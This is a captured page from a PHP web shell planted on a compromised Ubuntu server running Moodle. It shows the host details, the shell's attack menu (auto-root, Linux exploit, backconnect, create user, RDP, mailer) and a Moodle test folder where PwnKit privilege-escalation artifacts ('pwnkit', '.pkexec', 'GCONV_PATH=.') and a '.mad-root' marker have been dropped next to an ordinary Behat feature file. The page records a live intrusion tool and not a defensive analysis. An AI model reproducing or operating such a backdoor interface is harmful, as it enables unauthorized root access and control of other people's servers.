Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
course /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
activities_edit_completion.fea...
2.4
KB
-rwxrwxrwx
activities_edit_name.feature
1.75
KB
-rwxrwxrwx
activities_group_icons.feature
1.79
KB
-rwxrwxrwx
activities_indentation.feature
2.06
KB
-rwxrwxrwx
activities_visibility_icons.fe...
8.61
KB
-rwxrwxrwx
activity_chooser.feature
11.91
KB
-rwxrwxrwx
activity_navigation.feature
16.58
KB
-rwxrwxrwx
activity_navigation_with_restr...
3.38
KB
-rwxrwxrwx
add_activities.feature
2.19
KB
-rwxrwxrwx
behat_course.php
84.14
KB
-rwxrwxrwx
category_change_visibility.fea...
17.1
KB
-rwxrwxrwx
category_management.feature
22.89
KB
-rwxrwxrwx
category_resort.feature
10.92
KB
-rwxrwxrwx
category_role_assignment.featu...
1.57
KB
-rwxrwxrwx
course_browsing.feature
4.21
KB
-rwxrwxrwx
course_category_management_lis...
43.87
KB
-rwxrwxrwx
course_change_visibility.featu...
5.88
KB
-rwxrwxrwx
course_contact.feature
7.35
KB
-rwxrwxrwx
course_controls.feature
9.27
KB
-rwxrwxrwx
course_creation.feature
4.15
KB
-rwxrwxrwx
course_format.feature
4.1
KB
-rwxrwxrwx
course_relativedatesmode.featu...
2.09
KB
-rwxrwxrwx
course_request.feature
4.09
KB
-rwxrwxrwx
course_resort.feature
11.28
KB
-rwxrwxrwx
course_search.feature
1.59
KB
-rwxrwxrwx
coursetags.feature
3.96
KB
-rwxrwxrwx
create_delete_course.feature
5.13
KB
-rwxrwxrwx
customfields_locked.feature
1.26
KB
-rwxrwxrwx
customfields_visibility.featur...
3.39
KB
-rwxrwxrwx
edit_settings.feature
2.49
KB
-rwxrwxrwx
force_group_mode.feature
2.11
KB
-rwxrwxrwx
frontpage_display_modes.featur...
3.15
KB
-rwxrwxrwx
general_section.feature
1.5
KB
-rwxrwxrwx
keyholder.feature
2.23
KB
-rwxrwxrwx
max_number_sections.feature
1.95
KB
-rwxrwxrwx
move_activities.feature
2.14
KB
-rwxrwxrwx
move_sections.feature
2.6
KB
-rwxrwxrwx
navigate_course_list.feature
3.09
KB
-rwxrwxrwx
paged_course_navigation.featur...
5.97
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
recommend_activities.feature
2
KB
-rwxrwxrwx
rename_roles.feature
2.47
KB
-rwxrwxrwx
restrict_available_activities....
1.88
KB
-rwxrwxrwx
role_renaming.feature
1.7
KB
-rwxrwxrwx
search_recommended_activities....
1
KB
-rwxrwxrwx
section_highlighting.feature
1.78
KB
-rwxrwxrwx
section_visibility.feature
2.24
KB
-rwxrwxrwx
view_subfolders_inline.feature
3.04
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : course_format.feature
@core @core_course Feature: Teacher can change the course format In order to change course format As a teacher I should be able to edit a course @javascript Scenario: Teacher can change the course format Given the following "users" exist: | username | firstname | lastname | email | | teacher1 | Teacher | 1 | teacher1@example.com | # Course format is initially set to Topics format And the following "courses" exist: | fullname | shortname | format | startdate | | Course 1 | C1 | topics | ## 1 day ago ## | And the following "course enrolments" exist: | user | course | role | | teacher1 | C1 | editingteacher | # Confirm that course format is Topics When I am on the "Course 1" course page logged in as teacher1 Then I should see "Topic 1" And I am on the "Course 1" "course editing" page And I expand all fieldsets # Fields that appear for Topics format exist # Also confirm contents of Hidden sections and Course layout select box And I should see "Hidden sections" And the "Hidden sections" select box should contain "Hidden sections are shown in collapsed form" And the "Hidden sections" select box should contain "Hidden sections are completely invisible" # Hidden sections default value is 0 (Hidden sections are shown in collapsed form) And the field "Hidden sections" matches value "0" And I should see "Course layout" And the "Course layout" select box should contain "Show all sections on one page" And the "Course layout" select box should contain "Show one section per page" # Course layout default value is 0 (Show all sections on one page) And the field "Course layout" matches value "0" # Set course format to Single activity format And I set the field "Format" to "Single activity format" And I expand all fieldsets # Confirm that fields that appear for Single activity format appears And I should see "Type of activity" And I set the field "Type of activity" to "Glossary" And I press "Save and display" And I set the field "Name" to "Glossary 1" And I press "Save and display" # Confirm that course page displays single activity of type Glossary And I should see "Browse the glossary using this index" And I should not see "Topic 1" And I am on the "Course 1" "course editing" page And I expand all fieldsets # Set course format to Weekly format And I set the field "Format" to "Weekly format" And I expand all fieldsets # Confirm that fields that appear for Weekly format appears # Also confirm contents of Hidden sections and Course layout select box And I should see "Hidden sections" And the "Hidden sections" select box should contain "Hidden sections are shown in collapsed form" And the "Hidden sections" select box should contain "Hidden sections are completely invisible" # Hidden sections default value is 0 (Hidden sections are shown in collapsed form) And the field "Hidden sections" matches value "0" And I should see "Course layout" And the "Course layout" select box should contain "Show all sections on one page" And the "Course layout" select box should contain "Show one section per page" # Course layout default value is 0 (Show all sections on one page) And the field "Course layout" matches value "0" And I press "Save and display" # Confirm that course page displays weekly sections And I should see "This week" And I should not see "Browse the glossary using this index" And I am on the "Course 1" "course editing" page And I expand all fieldsets # Set course format to Social format And I set the field "Format" to "Social format" # Confirm that fields that appear for Social format appears And I expand all fieldsets And I should see "Number of discussions" And the field "Number of discussions" matches value "10" And I press "Save and display" # Confirm that course page displays a forum And I should see "There are no discussion topics yet in this forum" And I should not see "This week"
Close